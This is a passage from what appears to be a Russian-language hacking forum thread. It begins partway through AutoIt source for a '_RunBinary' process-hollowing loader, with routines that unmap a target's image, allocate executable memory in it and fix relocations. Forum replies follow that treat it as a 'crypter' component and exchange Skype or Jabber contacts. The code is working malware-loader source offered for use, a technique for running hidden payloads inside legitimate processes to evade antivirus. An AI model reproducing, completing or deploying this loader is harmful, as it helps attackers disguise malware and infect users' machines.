        ;#region 12. CLOSE OPEN HANDLES AND RETURN PID
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess)
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
        ; All went well. Return new PID:
        Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")
    
    EndFunc   ;==>_RunBinary
    
    
    Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64)
        Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value
        Local $iSize = DllStructGetSize($tData) ; size of data
        Local $pData = DllStructGetPtr($tData) ; addres of the data structure
        Local $tIMAGE_BASE_RELOCATION, $iRelativeMove
        Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries
        Local $tEnries, $iData, $tAddress
        Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
        While $iRelativeMove < $iSize ; for all data available
            $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove)
            $iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress")
            $iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock")
            $iNumberOfEntries = ($iSizeofBlock - 8) / 2
            $tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8)
            ; Go through all entries
            For $i = 1 To $iNumberOfEntries
                $iData = DllStructGetData($tEnries, 1, $i)
                If BitShift($iData, 12) = $iFlag Then ; check type
                    $tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset
                    DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what's this all about
                EndIf
            Next
            $iRelativeMove += $iSizeofBlock
        WEnd
        Return 1 ; all OK!
    EndFunc   ;==>_RunBinary_FixReloc
    
    
    Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize)
        ; Allocate
        Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                "handle", $hProcess, _
                "ptr", $pAddress, _
                "dword_ptr", $iSize, _
                "dword", 0x1000, _ ; MEM_COMMIT
                "dword", 64) ; PAGE_EXECUTE_READWRITE
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            ; Try differently
            $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                    "handle", $hProcess, _
                    "ptr", $pAddress, _
                    "dword_ptr", $iSize, _
                    "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
                    "dword", 64) ; PAGE_EXECUTE_READWRITE
            ; Check for errors or failure
            If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
        EndIf
        Return $aCall[0]
    EndFunc   ;==>_RunBinary_AllocateExeSpaceAtAddress
    
    
    Func _RunBinary_AllocateExeSpace($hProcess, $iSize)
        ; Allocate space
        Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                "handle", $hProcess, _
                "ptr", 0, _
                "dword_ptr", $iSize, _
                "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
                "dword", 64) ; PAGE_EXECUTE_READWRITE
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
        Return $aCall[0]
    EndFunc   ;==>_RunBinary_AllocateExeSpace
    
    
    Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress)
        DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
                "ptr", $hProcess, _
                "ptr", $pAddress)
        ; Check for errors only
        If @error Then Return SetError(1, 0, 0) ; Failure
        Return 1
    EndFunc   ;==>_RunBinary_UnmapViewOfSection
    
    
    Func _RunBinary_IsWow64Process($hProcess)
        Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _
                "handle", $hProcess, _
                "bool*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure
        Return $aCall[2]
    EndFunc   ;==>_RunBinary_IsWow64Process
    
     
    labbepierre и hackerpro нравится это.
  2. 1stetcgoldmedal
    Статус
    Оффлайн
    Сообщения:
    22
    Симпатии:
    0
  3. PirateTM
    Статус
    Оффлайн
    Сообщения:
    83
    Симпатии:
    24
    На autoit тестил?
     
  4. 1stetcgoldmedal
    Статус
    Оффлайн
    Сообщения:
    22
    Симпатии:
    0
    [QUOTE = "포스트 PirateTM : 8152, 회원 : 3182"]? testil하는 AutoIt에서 [/ QUOTE]
    Yeah
     
  5. PirateTM
    Статус
    Оффлайн
    Сообщения:
    83
    Симпатии:
    24
    I'm start learn autoit. And it is amazing that it is possible to make a crypter. So his main functionality is to support GUI applications on windows
     
  6. 1stetcgoldmedal
    Статус
    Оффлайн
    Сообщения:
    22
    Симпатии:
    0
    What U R Skype or Jabber?
     
  7. PirateTM
    Статус
    Оффлайн
    Сообщения:
    83
    Симпатии:
    24